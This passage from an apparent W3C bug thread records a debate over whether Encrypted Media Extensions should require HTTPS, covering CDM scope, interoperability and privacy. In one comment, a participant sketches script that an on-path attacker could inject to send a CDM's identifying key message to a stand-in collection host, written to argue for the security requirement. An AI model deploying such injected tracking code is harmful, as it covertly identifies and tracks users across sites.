> to the spec overall, as much of the discussion related to this spec has been
> whether or not it's tangibly different than the <object> tag. Your statement
> - which is that CDMs are UA-specific - would seem to support an
> intentionally far less interoperable view than many W3C members have
> realized.

Mark is not stating that it is intentional. At this point, it is just a historical fact, not predicated or influenced by the spec.

> 
> 
> > As with any other API, both the user and the web developer rely on the UA to
> > protect their security and privacy. They should have the same guarantees
> > with respect to EME as they have with respect to the same-origin policy, for
> > example.
> 
> Mark, I'm sure you can see that, unlike the same-origin policy or other
> security relevant features, it is a by-design goal of the authors of this
> spec that the capabilities of a CDM be opaque to the general public and
> authoring community, beyond that which the CDM author shares. Unlike the
> same origin policy, this makes it difficult to evaluate the security and
> privacy context in which these CDMs operate.

The authors of the EME spec are the HTML WG, not the editors. It is certainly not true that it is a by-design goal of the WG that the capabilities of a CDM be opaque.

CDMs operate as an integral (or integrated) part of a UA; therefore, they are as opaque or as transparent as the UA vendor chooses to make them. If a UA supports installable CDMs, then it is up to the installer to determine their level of trust by whatever means they require. This is SOP for the Web today.

> 
> Considering that you and your fellow authors have listed a number of
> capabilities being exposed to CDMs that are otherwise not exposed to the web
> (except via the <object> tag), which carry with them significant privacy
> risks and support for permanent device identifiers, I think it's a bit
> disingenuous to compare a privacy net-negative with features designed to
> bolster security, or to suggest that users should fully rely on the UA to
> assuage their privacy concerns for a spec developed publicly and with the
> intent of being a W3C document.

A user that entirely relies upon a UA to "assuage their privacy concerns" is simply ignorant of the risks that exist in either the pre-EME world of media or the EME world. EME and CDMs don't change this fact.

> 
> > 
> > > 
> > > Further, because of the EME/CDM split, it's likely (as we can see even from
> > > the comments by UAs on this bug) for two vendors to disagree as to whether a
> > > particular CDM is sufficiently secure for users - with one requiring a
> > > secure transport (because key exchange or functionality is insufficiently
> > > handled) while another permitting it on easily intercepted and manipulated
> > > channels such as HTTP.
> > 
> > I don't think we have had such a disagreement as no two UA vendors are
> > presently integrating the same CDM.
> 
> I don't feel this satisfactorily deals with the issue, unless you believe
> that a lack of interoperability is a goal or feature of this specification.

Nobody thinks that lack of interoperability is a goal or feature. That's just a silly statement.

> 
> It would seem, based on the significant feedback from the community, that
> having two or more UA vendors ship the same CDM is a highly desirable
> outcome.

Sure. If EME is ever going to be successful in anything other than vertical silos, then there will need to be some commonly supported CDMs.

> As such, it does not seem you can reasonably ignore or dismiss this
> issue, unless you believe that UA vendors should not ship interoperable CDMs.

You are talking apples and oranges. This issue (requiring HTTPS) has nothing to do with interoperability.

> 
> 
> > > The
> > > closest approximation is the non-normative requirements in Section 6
> > > (Security) and 7 (Privacy) that "CDM implementors must provide sufficient
> > > information and controls to user agent implementers", but one can say that
> > > the exact same requirements exist for plugins via <object> today.
> > 
> > Not at all. There is no mechanism for UA implementors to obtain information
> > from NPAPI plugins as to their security and privacy properties. 
> 
> I'm not sure - are you suggesting that this exists for CDMs? Or is this
> merely a statement to the effect that "Since you can't do it for NPAPI, you
> don't need to do it for EME"?
> 
> > Nor is there
> > any established practice of UAs whitelisting only those plugins for which
> > the security and privacy properties are understood. 
> 
> There has been, for some time, such a practice.
> 
> http://www.chromium.org/developers/npapi-deprecation
> http://blogs.msdn.com/b/ie/archive/2011/02/28/activex-filtering-for-
> consumers.aspx
Comment 27 Ryan Sleevi 2014-08-19 17:44:44 UTC
(In reply to Glenn Adams from comment #26)
> (In reply to Ryan Sleevi from comment #25)
> > (In reply to Mark Watson from comment #24)
> > > No, but there is no need for anyone to do such an analysis. The UAs
> > > implementing EME all know what CDMs they are integrating with and their
> > > security and privacy properties. 
> > 
> > In the W3C, there has been a priority of constituentcies that inherently
> > recognizes the reality of multiple stakeholders being party to the
> > conversations. Users, developers/authors, implementers are all part of the
> > equation.
> > 
> > It sounds like you are stating that only UAs can or should be part of the
> > security and privacy analysis, and that seems to run counter to the W3C's
> > goals of being an open and transparent organization.
> 
> To the extent that UAs do not support user installable CDMs, then Mark is
> correct.
> 
> In any case, what UAs do with CDMs has no bearing on the W3C as an "open and
> transparent organization".

Glenn,

You cannot say that the spec doesn't support user-installable CDMs, and then later say it's up to the UA.

The point is that the *spec* provides no such guarantees OR restrictions, in which case, evaluating the *spec*'s privacy and security considerations cannot be done, because there is information and context lacking.

This absolutely affects the ability of the W3C to adequately review and understand the spec, as withholding details ("It's up to the CDM"), with no definition for how those CDMs are evaluated, AND with the express statement that CDMs can only be evaluated by UAs, directly prevents those interested in privacy and security from providing meaningful feedback as to how the spec guarantees or inhibits these.

> Whether CDMs are an open plugin API or not is the decision of the UA vendor.

This may be, but it has direct bearing on the interoperability and applicability of this spec.

> The spec will not place requirements on UAs with respect to how they choose
> to support CDMs. If you would like to write another spec that does so, then
> you may draft and submit it for consideration.

This response fails to address the original issue which Mark was deflecting. It may well be the view of the WG that this should go unaddressed, in which case, it should be unsurprising if objections are raised.

This is an opportunity to improve the spec. Let's take it.

> Mark is not stating that it is intentional. At this point, it is just a
> historical fact, not predicated or influenced by the spec.

This is odd, because you just stated as much in the above quoted reply. It's absolutely influenced by the spec and whether or not it places normative requirements, and the absence of these requirements affects the ability to review the security, privacy, and interoperability guarantees of the spec.

> CDMs operate as an integral (or integrated) part of a UA; 

"The spec will not place requirements on UAs with respect to how they choose to support CDMs"

These two statements are in conflict. Either it's an integrated, integral part of a UA, or it's not.

> > > I don't think we have had such a disagreement as no two UA vendors are
> > > presently integrating the same CDM.
> > 
> > I don't feel this satisfactorily deals with the issue, unless you believe
> > that a lack of interoperability is a goal or feature of this specification.
> 
> Nobody thinks that lack of interoperability is a goal or feature. That's
> just a silly statement.

Then you can't deflect an interoperability concern with the response "Well, it's not a concern because there isn't interoperability".

If interoperability is a concern, then this is an issue, and it has to be dealt with. The only reasonable reason not to deal with it is if interoperability is not a goal.

> > As such, it does not seem you can reasonably ignore or dismiss this
> > issue, unless you believe that UA vendors should not ship interoperable CDMs.
> 
> You are talking apples and oranges. This issue (requiring HTTPS) has nothing
> to do with interoperability.

If only this were the case!

If I, as an author, wish to use EME on my page - an EME CDM that is implemented by multiple UAs (since we say interoperability is a goal) - then what do I, as an author, need to do to enable this?

Can I deploy it over HTTP and be assured it will work by all UAs that implement the CDM and conform to the spec?

The answer is certainly no.

If I deploy CDM A, which works with UA A, and then later choose CDM B, which works with UA's B and C, where CDM A/UA A worked over HTTP, can I be assured that my switch to CDM B, fully conforming to this spec, will work?

The answer is certainly no.

These are real interoperability concerns. Whether or not this API works over insecure transports and insecure origins, whether or not it sufficiently protects privacy, these are all things authors and implementors have to consider.

Failing to say anything is to require HTTP be supported, which is unquestionably harmful to security and privacy.
Failing to require HTTPS is equally a failure to guarantee interoperability according to the spec.
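
To make the interoperability concern concrete: absent a normative rule, about the best an author can do is probe each candidate key system and fall back, with no spec-level guarantee of which combinations work on the current origin. A hedged sketch against the draft-era MediaKeys.create() (the key system names are invented):

  const candidates = ["com.example.cdm-a", "com.example.cdm-b", "org.w3.clearkey"];

  function firstUsableKeySystem(list) {
    if (list.length === 0) {
      return Promise.reject(new Error("no usable key system on this origin"));
    }
    // If creation is rejected (e.g. insecure origin under option #1), try the next.
    return MediaKeys.create(list[0]).then(
      mediaKeys => ({ keySystem: list[0], mediaKeys }),
      () => firstUsableKeySystem(list.slice(1)));
  }

  firstUsableKeySystem(candidates).then(
    result => console.log("using", result.keySystem),
    err => console.log(err.message));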
Comment 28 Mark Watson 2014-08-19 17:58:09 UTC
I would have no objection to a requirement that arbitrary non-sandboxed user-installable CDMs may only be installed with user consent and from a secure origin. That makes complete sense, because the UA has no idea what that thing is and the user needs to know who they are being asked to trust.

But if the UA is fully aware of the CDM properties and/or aware of the properties of the sandbox, if the CDM is integrated in the UA (not downloaded by the site) then it is the UA, not the site, that the user is being asked to trust and the situation is very different.
Comment 29 Joe Steele 2014-08-19 18:02:32 UTC
(In reply to Ryan Sleevi from comment #25)
> It would seem, based on the significant feedback from the community, that
> having two or more UA vendors ship the same CDM is a highly desirable
> outcome. As such, it does not seem you can reasonably ignore or dismiss this
> issue, unless you believe that UA vendors should not ship interoperable CDMs.

I certainly support the idea of multiple UA vendors shipping the same CDM (or at least CDMs from the same vendor). I also support having the EME functionality be interoperable across CDMs where possible.
Comment 30 Joe Steele 2014-08-19 18:07:55 UTC
(In reply to Glenn Adams from comment #26)
> (In reply to Ryan Sleevi from comment #25)
> The spec will not place requirements on UAs with respect to how they choose
> to support CDMs. If you would like to write another spec that does so, then
> you may draft and submit it for consideration.

I don't think the W3C is the appropriate forum for that spec. However I would like to be a party to that process if someone does start it. There are at least three APIs to choose from to date: Microsoft CDMi, Google Pepper CDM, Firefox GMP. 

However given that none of the UA vendors so far has indicated that they would allow a plugin written to these APIs to be accessed from the UA without some prior relationship with the UA vendor, I wonder about the value of such a spec.
Comment 31 Glenn Adams 2014-08-19 18:32:56 UTC
(In reply to Ryan Sleevi from comment #27)
> (In reply to Glenn Adams from comment #26)
> > (In reply to Ryan Sleevi from comment #25)
> > > (In reply to Mark Watson from comment #24)
> > > > No, but there is no need for anyone to do such an analysis. The UAs
> > > > implementing EME all know what CDMs they are integrating with and their
> > > > security and privacy properties. 
> > > 
> > > In the W3C, there has been a priority of constituencies that inherently
> > > recognizes the reality of multiple stakeholders being party to the
> > > conversations. Users, developers/authors, implementers are all part of the
> > > equation.
> > > 
> > > It sounds like you are stating that only UAs can or should be part of the
> > > security and privacy analysis, and that seems to run counter to the W3C's
> > > goals of being an open and transparent organization.
> > 
> > To the extent that UAs do not support user installable CDMs, then Mark is
> > correct.
> > 
> > In any case, what UAs do with CDMs has no bearing on the W3C as an "open and
> > transparent organization".
> 
> Glenn,
> 
> You cannot say that the spec doesn't support user-installable CDMs, and then
> later say it's up to the UA.

Sure you can. The spec is silent on whether a CDM is user-installable or not. Therefore, it is up to the UA.

> 
> The point is that the *spec* provides no such guarantees OR restrictions

So? No W3C spec provides any guarantee... the W3C does not certify products that implement its specifications.

> , in
> which case, evaluating the *spec*'s privacy and security considerations
> cannot be done, because there is information and context lacking.

Sure it can (evaluate). And yes, it will never be complete, because information and context are always lacking (from any spec). Only an implementation of the spec can be fully evaluated.


> 
> This absolutely affects the ability of the W3C to adequately review and
> understand the spec,

Sure it does. And that is by design. CDMs are explicitly out of scope of EME.

Your problem is that you don't seem to agree with this decision. But it holds and will not be changed.

> as withholding details ("It's up to the CDM"),

There is no "withholding details". There are simply "implementation details that are out of scope". You are talking to the wrong people. If you want to do a security and privacy analysis of a CDM in a specific UA then you need to be talking to the CDM and UA vendor. Your comments are misdirected if you think they will be addressed by EME.

> with no
> definition for how those CDMs are evaluated, AND with the express statement
> that CDMs can only be evaluated by UAs, directly prevents those interested
> in privacy and security from providing meaningful feedback as to how the
> spec guarantees or inhibits these.

W3C specs do not guarantee or restrict UA behavior. They may do whatever they want, and in fact, they do.

> 
> > Whether CDMs are an open plugin API or not is the decision of the UA vendor.
> 
> This may be, but it has direct bearing on the interoperability and
> applicability of this spec.

The same statement can be made for every W3C specification. For example, the HTML5 specification does not require support for: JavaScript, CSS, any specific image or media format, and a myriad of other features.

> 
> > The spec will not place requirements on UAs with respect to how they choose
> > to support CDMs. If you would like to write another spec that does so, then
> > you may draft and submit it for consideration.
> 
> This response fails to address the original issue which Mark was deflecting.
> It entirely be the view of the WG that you choose to fail to address this,
> in which case, it should be unsurprising if objections are raised.

The WG is not going to revisit the decision of determining that CDM details are out-of-scope. You can object, but it will serve no purpose.

> 
> This is an opportunity to improve the spec. Let's take it.

No and no. It will not improve the spec (and in fact will damage it). And no, the WG will not revisit the decision that CDMs are out of scope.

> 
> > Mark is not stating that it is intentional. At this point, it is just a
> > historical fact, not predicated or influenced by the spec.
> 
> This is odd, because you just stated as much in the above quoted reply.

You said:

> Your statement
> - which is that CDMs are UA-specific - would seem to support an
> intentionally far less interoperable view than many W3C members have
> realized.

This pertains to whether UAs are intentionally UA-specific or not. Mark was not saying that "UAs are intentionally UA-specific". If they are (at the moment) then that is a historical coincidence and has no necessary relation to the spec or future implementations.

> It's
> absolutely influenced by the spec and whether or not it will or will not
> place normative requirements, and the absence of these requirements affects
> the ability to review the security, privacy, and interoperability guarantees
> of the spec.

Sure. But you are merely stating the obvious: "that not defining CDMs means that the security and privacy considerations of CDMs cannot be evaluated". That is a consequence of ruling that CDM details are out of scope of EME. That can't be helped.

> 
> > CDMs operate as an integral (or integrated) part of a UA; 
> 
> "The spec will not place requirements on UAs with respect to how they choose
> to support CDMs"
> 
> These two statements are in conflict. Either it's an integrated, integral
> part of a UA, or it's not.

No, these statements are not in conflict. If a CDM is integrated, then the UA ships with the CDM. If a CDM is from a third party and can be installed after the UA ships, then it is not integrated. The spec doesn't restrict whether a UA supports only one or both of these models. The spec only requires that every implementation of EME provide an integrated CDM that implements the org.w3.clearkey key system. Beyond that, it is up to the UA vendor.
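
For illustration, a minimal sketch of Clear Key feature detection from the application side. The promise-based entry point follows later EME drafts (navigator.requestMediaKeySystemAccess); drafts contemporary with this bug used MediaKeys.create(), so treat the exact shape as an assumption:

    // Clear Key is the one key system every EME implementation must provide,
    // so a page can probe for it without knowing which (if any) proprietary
    // CDMs the UA integrates.
    const video = document.querySelector('video');
    navigator.requestMediaKeySystemAccess('org.w3.clearkey', [{
      initDataTypes: ['keyids'],
      videoCapabilities: [{ contentType: 'video/webm; codecs="vp8"' }]
    }]).then(access => access.createMediaKeys())
      .then(mediaKeys => video.setMediaKeys(mediaKeys))
      .catch(err => console.log('Clear Key unavailable:', err));

Anything beyond Clear Key remains a per-UA question, which is exactly the point under dispute.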

> 
> > > > I don't think we have had such a disagreement as no two UA vendors are
> > > > presently integrating the same CDM.
> > > 
> > > I don't feel this satisfactorily deals with the issue, unless you believe
> > > that a lack of interoperability is a goal or feature of this specification.
> > 
> > Nobody thinks that lack of interoperability is a goal or feature. That's
> > just a silly statement.
> 
> Then you can't deflect an interoperability concern with the response "Well,
> it's not a concern because there isn't interoperability".
> 
> If interoperability is a concern, then this is an issue, and it has to be
> dealt with. The only reasonable reason not to deal with it if
> interoperability is not a goal.

You seem to imply that interoperability is black or white. Interoperability is always a gray scale. One of the levels of interoperability is whether the publicly defined EME interfaces interoperate under certain constraints. Another level is whether an end-to-end media stream will interoperate between a given server and distinct UA (and CDM) implementations. The former is clearly in scope for EME; the latter is clearly not in scope. You seem to want to make the latter in scope, but it isn't: by definition.

> 
> > > As such, it does not seem you can reasonably ignore or dismiss this
> > > issue, unless you believe that UA vendors should not ship interoperable CDMs.
> > 
> > You are talking apples and oranges. This issue (requiring HTTPS has nothing
> > to do with interoperability).
> 
> If only this were the case!
> 
> If I, as an author, which to use EME on my page - an EME CDM that is
> implemented by multiple UAs (since we say interoperability is a goal) - then
> what do I, as an author, need to do to enable this?

I fully agree with you, and wearing my hat as a service provider member (Cox Communications), this is also our major concern for EME. However, we recognize that there are boundaries on what EME can and should define, and this has to be considered in the wider context of the fact that the W3C does not publish conformance tests and does not assess the compliance of implementations.

> 
> Can I deploy it over HTTP and be assured it will work by all UAs that
> implement the CDM and conform to the spec?
> 
> The answer is certainly no.

Agreed. But you will never get such a guarantee in the context of W3C. Go start and fund a consortium to publish and perform compliance tests, then award labels to products that pass. After you do that, let us know how it turns out.

> 
> If I deploy CDM A, which works with UA A, and then later choose CDM B, which
> works with UA's B and C, where CDM A/UA A worked over HTTP, can I be assured
> that my switch to CDM B, fully conforming to this spec, will work?
> 
> The answer is certainly no.

No argument here. But this is not relevant to this issue.

> 
> These are real interoperability concerns. Whether or not this API works over
> insecure transports and insecure origins, whether or not it sufficiently
> protects privacy, these are all things authors and implementors have to
> consider.

Sure.

> 
> Failing to say anything is to require HTTP be supported

No it isn't.

>, which is
> unquestionably harmful to security and privacy.
> Failing to require HTTPS is equally a failure to guarantee interoperability
> according to the spec.

Requiring HTTPS does not guarantee interoperability.
Comment 32 Glenn Adams 2014-08-19 18:35:51 UTC
(In reply to Glenn Adams from comment #31)
> (In reply to Ryan Sleevi from comment #27)
> You said:
> 
> > Your statement
> > - which is that CDMs are UA-specific - would seem to support an
> > intentionally far less interoperable view than many W3C members have
> > realized.
> 
> This pertains to whether UAs are intentionally UA-specific or not. Mark was
> not saying that "UAs are intentionally UA-specific". If they are (at the
> moment) then that is a historical coincidence and has no necessary relation
> to the spec or future implementations.

s/UAs are intentionally/CDMs are intentionally/g
Comment 33 Glenn Adams 2014-08-19 19:18:46 UTC
(In reply to Joe Steele from comment #30)
> (In reply to Glenn Adams from comment #26)
> > (In reply to Ryan Sleevi from comment #25)
> > The spec will not place requirements on UAs with respect to how they choose
> > to support CDMs. If you would like to write another spec that does so, then
> > you may draft and submit it for consideration.
> 
> I don't think the W3C is the appropriate forum for that spec.

I wouldn't disagree, but that doesn't prevent someone from offering a draft here.

> However I
> would like to be a party to that process if someone does start it. There are
> at least three APIs to choose from to date: Microsoft CDMi, Google Pepper
> CDM, Firefox GMP. 
> 
> However given that none of the UA vendors so far has indicated that they
> would allow a plugin written to these APIs to be accessed from the UA
> without some prior relationship with the UA vendor, I wonder about the value
> of such a spec.

That's a separate issue.
Comment 34 David Dorwin 2014-08-19 21:02:28 UTC
This is off topic, but for the record:

(In reply to Ryan Sleevi from comment #25)
> (In reply to Mark Watson from comment #24)
> > This is not an open plugin API with user-installable CDMs.
> 
> While I appreciate you making this point, I feel that this is just your
> opinion. Both of your co-editors, and their respective organizations, have
> positioned EME/CDM as precisely that, both in public discussions and, on a
> more practical matter, within the code itself.

I don't believe this is true (for me and Google, at least).

...
> On Google's side, EME/CDM is exposed through the Pepper plugin interface,
> Google's replacement for NPAPI. Indeed, even the existing EME
> implementations in Chrome are programmatically no different than generic
> plugins.

This is not an accurate description of Chrome's implementation. On desktop platforms, Chrome hosts CDMs in a Pepper process. However, this is an internal implementation detail and the interface to the CDM is actually different. Also, it is not possible to add a key system by installing a "plugin".
Comment 35 David Dorwin 2014-08-19 21:05:46 UTC
(In reply to Glenn Adams from comment #26)
> A user that entirely relies upon a UA to "assuage their privacy concerns" is
> simply ignorant of the risks that exist in either the pre-EME world of media
> or the EME world. EME and CDMs don't change this fact.

Many users do assume user agents are doing what they can to protect the user's privacy, and user agents are continuously implementing features to address (emerging) threats.

(In reply to Glenn Adams from comment #31)
> Sure it does. And that is by design. CDMs are explicitly out of scope of EME.

> That is a consequence of ruling that CDM details are out of scope of EME.
> That can't be helped.

I think it is incorrect to say that all CDM details are out of scope. The spec currently leaves robustness, license exchange, etc. undefined, but there are some requirements on the CDM's behavior in the normative algorithms and we are discussing others to improve interoperability.

> The WG is not going to revisit the decision of determining that CDM details
> are out-of-scope. You can object, but it will serve no purpose.

> No and No. It will not improve the spec (and in fact will damage it). And No
> the WG will not revisit the decision that CDMs are out of scope.

These are opinions. It's not possible to make such absolute statements about what the HTML WG might do.

> Sure. But you are merely stating the obvious: "that not defining CDMs means
> that the security and privacy consideration of CDMs cannot be evaluated".
> That is a consequence of ruling that CDM details are out of scope of EME.
> That can't be helped.

Even if one assumes the CDM details are out of scope, the spec can mitigate issues through normative requirements on the user agents - that is what is being discussed here.
Comment 36 David Dorwin 2014-08-19 21:21:07 UTC
It has been argued that user agents will do what is right (for the CDMs they support) and that there is therefore no need to require HTTPS. I do not believe this would be true in practice.

I think it is unlikely that most user agent implementors will have access to or seek out the information necessary to make the correct decision. (Think beyond the major browser vendors.) I think the spec can and should try to avoid such judgement calls on important issues.

Furthermore, suppose that a user agent implementor does not feel comfortable with the capabilities of the CDM (i.e. one built into the platform). They _could_ choose to require HTTPS, but if all other implementations have not made that requirement, the user agent will likely be limited to a small set of content providers that support HTTPS. Instead, that implementor will probably expose the CDM to HTTP anyway, resulting in exactly the problems we are trying to avoid. As I said above, "it is likely that the only way to actually address the issue is to normatively require secure origins..."
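
To make the normative option concrete, here is a sketch of what option #1 from comment #0 amounts to from the page's perspective. window.isSecureContext is an assumption here (it postdates this discussion), and initializeEme is a hypothetical application function:

    // Refuse to touch EME at all unless the page is on a secure origin,
    // mirroring the check a UA would perform when creating MediaKeys.
    if (window.isSecureContext) {
      initializeEme();  // hypothetical application function that calls EME
    } else {
      // Move to HTTPS rather than exposing identifiers over clear HTTP.
      location.replace(location.href.replace(/^http:/, 'https:'));
    }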


Much of the discussion has focused on identities, but there are other concerns as well. For example, DRM implementations, especially those provided by the platform, are often unsandboxed. This means that such CDMs could access anything on the system, and they are particularly dangerous because they run outside the sandbox. Given these risks and the unique nature of EME/CDMs compared to other web APIs, it makes sense that such risks should be restricted to authenticated domains.

Other potential mitigations to these risks (e.g. prompting the user) are also non-normative, so we cannot rely on them. Even if we made user prompts normative, the benefit is minimized if non-secure origins are supported (see [1] in comment #0).
Comment 37 Glenn Adams 2014-08-19 21:43:52 UTC
(In reply to David Dorwin from comment #35)
> (In reply to Glenn Adams from comment #31)
> > Sure it does. And that is by design. CDMs are explicitly out of scope of EME.
> 
> > That is a consequence of ruling that CDM details are out of scope of EME.
> > That can't be helped.
> 
> I think it is incorrect to say that all CDM details are out of scope.

The kinds of details being discussed here are out of scope, i.e., sufficient details to perform a full security/privacy analysis.

> > No and No. It will not improve the spec (and in fact will damage it). And No
> > the WG will not revisit the decision that CDMs are out of scope.
> 
> These are opinions It's not possible to make such absolute statements about
> what the HTML WG might do.

I just did (make such a statement). I predict it is true and will remain true.
Comment 38 Joe Steele 2014-08-19 22:03:10 UTC
Putting aside the dangers of CDMs running un-sandboxed code, I am not convinced that this change would result in much better privacy. 

This would secure network communications against man-in-the-middle snooping at the potential expense of usability on some browsers. But the information would still be provided to the origin that requested it. 

From a practical point of view, getting you to visit my secure (but rogue) domain is much easier than getting between you and a legitimate server (secure or not). 

So if there were a "rogue" CDM that leaks an insecure permanent user identifier -- it could still do that. 

I think having guidelines for what UAs should watch out for before agreeing to include a potentially "rogue" CDM is a better approach.
Comment 39 Ryan Sleevi 2014-08-19 22:16:50 UTC
(In reply to Joe Steele from comment #38)
> Putting aside the dangers of CDMs running un-sandboxed code, I am not
> convinced that this change would result in much better privacy. 
> 
> This would secure network communications against man-in-the-middle snooping
> at the potential expense of usability on some browsers. But the information
> would still be provided to the origin that requested it. 
> 
> From a practical point of view, getting you to visit my secure (but rogue)
> domain is much easier than getting between you and a legitimate server
> (secure or not). 
> 
> So if there were a "rogue" CDM that leaks an insecure permanent user
> identifier -- it could still do that. 
> 
> I think having guidelines for what UAs should watch out for before agreeing
> to include a potentially "rogue" CDM is a better approach.

I think you're conflating two things.

Allowed on an insecure origin, any MITM can themselves play as a rogue CDM. That is, even if you prompted and included a rogue CDM, network-level attackers (of which there are many, and increasing, as evidence shows) should not be able to infer or extract tracing data from it.

I absolutely agree that an evil origin could collude with a rogue CDM to track the user. That's covered in the security properties. What isn't covered is the fact that any evil network can collude with a rogue CDM - or the fact that a "rogue CDM" is an abstract concept that it seems some are committed to declaring "out of scope", ergo by definition, "not rogue".
Comment 40 Mark Watson 2014-08-19 22:30:35 UTC
(In reply to David Dorwin from comment #36)
> 
> 
> Much of the discussion has focused on identities, but there are other
> concerns as well. For example, DRM implementations, especially those
> provided by the platform, are often unsandboxed. This means that such CDMs
> could access anything on the system and it are particularly dangerous
> because they run outside the sandbox. Given these risks and the unique
> nature of EME/CDMs compared to other web APIS, it makes sense that such
> risks should be restricted to authenticated domains.

Why is a platform CDM API any different from any other platform API in this respect ?

> 
> Other potential mitigations to these risks (i.e. prompt the user) are also
> non-normative, so we cannot rely on those. Even if we made user prompts
> normative, the benefit is minimized if non-secure origins are supported (see
> [1] in comment #0).

There are many examples where UA implementors - and everyone else - agree that a user prompt is necessary but no such prompt is normatively required by W3C specifications. We don't generally specify such UI issues, but that does not mean that we should behave as if they do not exist and adopt unnecessary restrictions as a result.
Comment 41 Joe Steele 2014-08-19 22:35:15 UTC
(In reply to Ryan Sleevi from comment #39)
> (In reply to Joe Steele from comment #38)
> > Putting aside the dangers of CDMs running un-sandboxed code, I am not
> > convinced that this change would result in much better privacy. 
> > 
> > This would secure network communications against man-in-the-middle snooping
> > at the potential expense of usability on some browsers. But the information
> > would still be provided to the origin that requested it. 
> > 
> > From a practical point of view, getting you to visit my secure (but rogue)
> > domain is much easier than getting between you and a legitimate server
> > (secure or not). 
> > 
> > So if there were a "rogue" CDM that leaks an insecure permanent user
> > identifier -- it could still do that. 
> > 
> > I think having guidelines for what UAs should watch out for before agreeing
> > to include a potentially "rogue" CDM is a better approach.
> 
> I think you're conflating two things.

What are the two things you think I am conflating?

> 
> Allowed on an insecure origin, any MITM can themselves play as a rogue CDM.

I don't understand what you mean here. Are you talking about a MITM injecting script into the application? (this is feasible) Or are you talking about a MITM injecting a rogue CDM? (this is less feasible, but if we are stipulating an untrustworthy UA anything is possible)

> That is, even if you prompted and included a rogue CDM, network-level
> attackers (of which there are many, and increasing, as evidence shows)
> should not be able to infer or extract tracing data from it.

My point is that we are better off asking UAs to prevent rogue CDMs than requiring UAs to implement security half-measures against what they might do. 

> 
> I absolutely agree that an evil origin could collude with a rogue CDM to
> track the user. That's covered in the security properties. What isn't
> covered is the fact that any evil network can collude with a rogue CDM - or
> the fact that a "rogue CDM" is an abstract concept that it seems some are
> committed to declaring "out of scope", ergo by definition, "not rogue".
Comment 42 Ryan Sleevi 2014-08-19 22:44:40 UTC
(In reply to Joe Steele from comment #41)
> (In reply to Ryan Sleevi from comment #39)
> > I think you're conflating two things.
> 
> What are the two things you think I am conflating?

"Rogue" CDMs and rogue intermediates.

I'm not sure I agree with the classification that there even is a "rogue CDM" - it's clear from the CDMs already in existence that certain privacy properties (or lack) are by-design of the CDM. Ergo, they're behaving exactly as that CDM should - but in a way that is detrimental to the user.

The issue is that any intermediate can, for unprotected traffic, inject script to use that CDM and report to an arbitrary party those results. That's just how the web works.

Even if you normatively required prompting, any site which the user had accepted (and I think we know what some of those sites will, in practice, be, given their representatives' participation in the spec and this WG) can be intercepted and used to track.

And it's not just when a UA visits one of these video sites - through the power of the web (read iframe and related), an 'attacker' (hostile intermediate) can inject the compromised video site into any site of the attacker's choosing. This was David's point [1] from the original report.

None of this has anything to do with "rogue CDMs". It's an inherent property of the spec, and has nothing to do with "preventing rogue CDMs", but fundamentally about protecting users.
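
To make the injection concrete, a hedged sketch of the script an on-path attacker could add to any plain-HTTP response; the key system name, init data, and collection endpoint are all illustrative, not taken from any real CDM:

    // Injected by a network intermediate into an arbitrary HTTP page.
    navigator.requestMediaKeySystemAccess('com.example.drm', [{
      initDataTypes: ['keyids']
    }]).then(access => access.createMediaKeys())
      .then(mediaKeys => {
        const session = mediaKeys.createSession();
        session.addEventListener('message', e => {
          // The key message is opaque to the UA; if the CDM embeds a stable
          // identifier, relaying it suffices to track the user across sites.
          fetch('http://attacker.example/collect',
                { method: 'POST', body: e.message });
        });
        // Init data contents are illustrative; any request that elicits a
        // key message carrying an identifier will do.
        return session.generateRequest('keyids', new Uint8Array([0]));
      });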
Comment 43 David Dorwin 2014-08-19 23:19:41 UTC
(In reply to Mark Watson from comment #40)
> (In reply to David Dorwin from comment #36)
> > 
> > 
> > Much of the discussion has focused on identities, but there are other
> > concerns as well. For example, DRM implementations, especially those
> > provided by the platform, are often unsandboxed. This means that such CDMs
> > could access anything on the system, and they are particularly dangerous
> > because they run outside the sandbox. Given these risks and the unique
> > nature of EME/CDMs compared to other web APIs, it makes sense that such
> > risks should be restricted to authenticated domains.
> 
> Why is a platform CDM API any different from any other platform API in this
> respect ?

The data that is extracted is opaque and sent to the application without any ability for the user agent to verify its contents (vs. location coordinates from a geolocation API, for example). CDMs are also generally more likely to be non-inspectable.

As one example, I believe some user agents validate WebGL commands before passing them to the GPU.

Many web APIs that expose platform functionality also normatively consider user authorization. This includes getUserMedia() and Web MIDI. There is also regret by some that the geolocation API was not restricted to secure origins "before it became too late."

> > Other potential mitigations to these risks (i.e. prompt the user) are also
> > non-normative, so we cannot rely on those. Even if we made user prompts
> > normative, the benefit is minimized if non-secure origins are supported (see
> > [1] in comment #0).
> 
> There are many examples where UA implementors - and everyone else - agree
> that a user prompt is necessary but no such prompt is normatively required
> by W3C specifications. We don't generally specify such UI issues, 

Counterexamples: getUserMedia() and Web MIDI

> but that
> does not mean that we should behave as if they do not exist and adopt
> unnecessary restrictions as a result.

As I said (and Ryan expands on in comment #42), prompts are insufficient on non-secure origins.

(In reply to Joe Steele from comment #41)
> My point is that we are better off asking UAs to prevent rogue CDMs than
> requiring UAs to implement security half-measures against what they might
> do. 

Reiterating what Ryan said, the concern is not necessarily about "rogue CDMs"; it is about limiting the damage that is possible when exposing a CDM that uses permanent identifiers, is not fully sandboxed, etc.
Comment 44 Mark Watson 2014-08-20 00:04:36 UTC
(In reply to David Dorwin from comment #43)
> (In reply to Mark Watson from comment #40)
> > (In reply to David Dorwin from comment #36)

> 
> Reiterating what Ryan said, the concern is not necessarily about "rogue
> CDMS", it is about limiting the damage that is possible when exposing a CDM
> that uses permanent identifiers, is not fully sandboxed, etc.

So why not apply the restriction only to such CDMs ? Why should the restriction apply to CDMs that do not expose permanent identifiers and/or are fully sandboxed ?
Comment 45 David Dorwin 2014-08-20 00:13:03 UTC
(In reply to Mark Watson from comment #44)
> (In reply to David Dorwin from comment #43)
> > (In reply to Mark Watson from comment #40)
> > > (In reply to David Dorwin from comment #36)
> 
> > 
> > Reiterating what Ryan said, the concern is not necessarily about "rogue
> > CDMS", it is about limiting the damage that is possible when exposing a CDM
> > that uses permanent identifiers, is not fully sandboxed, etc.
> 
> So why not apply the restriction only to such CDMs ? Why should the
> restriction apply to CDMs that do not expose permanent identifiers and/or
> are fully sandboxed ?

That is essentially option 2 in comment #0. As mentioned there and elsewhere, I think relying on such judgement calls will fail in practice.
Comment 46 Joe Steele 2014-08-20 23:14:59 UTC
(In reply to Ryan Sleevi from comment #42)
> (In reply to Joe Steele from comment #41)
> > (In reply to Ryan Sleevi from comment #39)
> > > I think you're conflating two things.
> > 
